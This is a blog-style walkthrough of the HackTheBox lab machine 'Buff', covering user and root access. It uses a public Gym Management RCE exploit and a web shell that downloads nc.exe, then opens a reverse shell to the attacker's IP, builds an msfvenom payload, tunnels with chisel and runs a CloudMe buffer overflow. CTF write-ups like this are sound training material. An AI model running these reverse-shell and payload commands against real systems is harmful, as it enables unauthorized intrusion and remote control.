SAFARAS K A
6 min readNov 1, 2020

Buff — HackTheBox (User and Root Flag ) Write-Up

I experienced some problems while hacking this machine (Buff) on HackTheBox. Took me 2 days to get the root flag, Not really needed the problem is mine. So I thought of writing the step by step procedure to find the flags easily. Let’s learn together. So let’s get straight into the process.

If you are new to HackTheBox go to Access and download your connection pack and run

sudo openvpn <user-name.ovpn>

when we go to the machine tab you can see the Buff there and will get the IP as 10.10.10.198

Buff machine details

As a start run basic scan with nmap : sudo nmap -sV -sC -sT -O 10.10.10.198 We can’t find anything interesting only port 8080 is open so let’s try on the WebApp. In real world while we are testing on WebApps, first we will visit all pages. Same here when we visit the URI /contact.php

That’s a nice Hint to the next level. As usuall when we get a hint such as this we need to google if there are any known vulnerabilities available to exploit. We can see there is a Remote Code Execution bug is there

So let’s find the User flag first

https://www.exploit-db.com/exploits/48506

So we got the exploit. Download the exploit. There when we read the exploit we can see that the bug is in the upload.php URI and Let’s exploit and find something run the following command to run the exploit.

python 48506.py http://10.10.10.198:8080/

wow!! so let’s try something cool, as said in the exploit the the bug is in upload.php and the files are uploaded to http://10.10.10.198:8080/upload/kamehameha.php?telepathy=<command-here> .Here kamehameha.php is the exploit file that’s uploaded and telepathy parameter is the parameter through which we are gonna run the commands. Next we need some files in order to proceed. Most of the files are there in our kali machine or else just google it and download ( simple search and download )

Mostly the file will be there

copy the file into a directory and on the same directory run:

sudo python3 -m http.server 80 — This will open a server on the directory and find your ip using ifconfig

If you dont have python3 installed : sudo apt install python3

so my ip is 10.10.14.25

Now we need to transfer the nc.exe to windows machine by our browser (there are many ways I prefered this one)

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/nc.exe

This will download nc.exe on the windows machine to confirm

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=dir

it will list the files in the directory and you can see kamehameha.php and nc.exe there. So lets make a reverse shell to our linux machine. For that we need to listen to a netcat server

netcat listening to port 1337

To connect back to this run the following on the browser

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=nc -e cmd.exe 10.10.14.25 1337

Yeee ! we got the shell back

The user flag is on the Desktop actually so in order to get that just

Yeee! got the user flag.

Hooray we got the user flag so submit it on HackTheBox and we need to find one more. In order to find root flag we need Admin privilages so we can’t access directly on /users/Administrator/Desktop/root.txt.

Let’s find the Root Flag

This one took my 70 % time to get, due to some problem with my ssh. Actually it’s simple. So lets dig more on the windows machine, as we are digging we can see there is a file in the Downloads folder

dir is used to list files on the folder

in order to confirm for any usage of this file let’s go back one more time to the previous upload directory and

Download winPEAS.exe

If you can’t find the file; run the following commands on the directory where we put the nc.exe and files

git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/

cp privilege-escalation-awesome-scripts-suite/winPEAS/winPEASexe/winPEAS/bin/x64/Release/winPEAS.exe ./

This will copy the file to to the directory

Download chisel.exe and chisel on linux — I preffered this because I already said that I have some problem with connecting to ssh, so for ssh purpose I use chisel. To download and install chisel:

https://github.com/jpillora/chisel/releases/download/v1.7.2/chisel_1.7.2_windows_amd64.gzchisel for windows, download the file and extract the chisel.exe to our directory

sudo apt install golang-go → if go is not installed

go get github.com/jpillora/chisel → install chisel on the linux

cp ~/go/bin/chisel /bin/ → will help to run chisel on terminal

chisel -h → to check if it’s installed properly

Now we need to transfer those files on to our windows machine. If you closed the python http.server we opened previously, once more run sudo python3 -m http.server 80. Then in order to transfer the files from the directory (make sure we opened http.server on the directory that have chisel.exe winPEAS.exe).

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/chisel.exe

http://10.10.10.198:8080/upload/kamehameha.php?telepathy=curl -O 10.10.14.25/winPEAS.exe

make sure your windows server is still connected and running just by ping 10.10.10.198 else connect once more and proceed.

After these all run dir on the windows server to list the transferred files. If they all right

So all are well

Now run winPEAS.exe it will show us the problems within that privilages running process and things like that, when we are looking carefully we can see that a port 8888 is used by something

just by running winPEAS.exe on windows

So we can confirm the cloudme is running (it’s on 8888) and now try to find any exploits. you will get one here : https://www.exploit-db.com/exploits/48389 Download it

Now we need to change payload on the exploit for that run

msfvenom -p windows/exec CMD=’C:\xampp\htdocs\gym\upload\nc.exe -e cmd.exe 10.10.14.25 7777' -b ‘\x00\x0A\x0D’ -f python -v payload

Copy the selected part and change it on the 48389.py

Now we can forward the 8888 port from windows to our linux machine in order to proceed the overflow vulnerability.

chisel server -p 8080 -reverse — on linux

chisel.exe client 10.10.14.25:8080 R:8888:127.0.0.1:8888→ on windows server

There we can see a connection goes on.

let’s listen to the port which we used in order to create the payload i.e 7777 and run the exploit on another terminal to get the admin shell

nc -lvnp 7777

python2.7 48389.py

We can see the admin shell on nc. If nothing happened run python2.7 exploit.py 2–3 times, till not working I don’t really know.

After getting into the admin shell :

cd /users/Administrator/Desktop/

test root.txt → this is the 2nd flag

ENJOY ENJOY ENJOY

!! I accidentally quit a terminal which is running shells and that’s why you miss screenshots. I don’t have time to do that again, so apologies. !!

You may seen people using ssh or plink.exe in order to find the root flag. For me when I run the plink.exe command on windows it always shows connection timed out so that I decided to try with chisel

Find me on twitter : iam_j0ker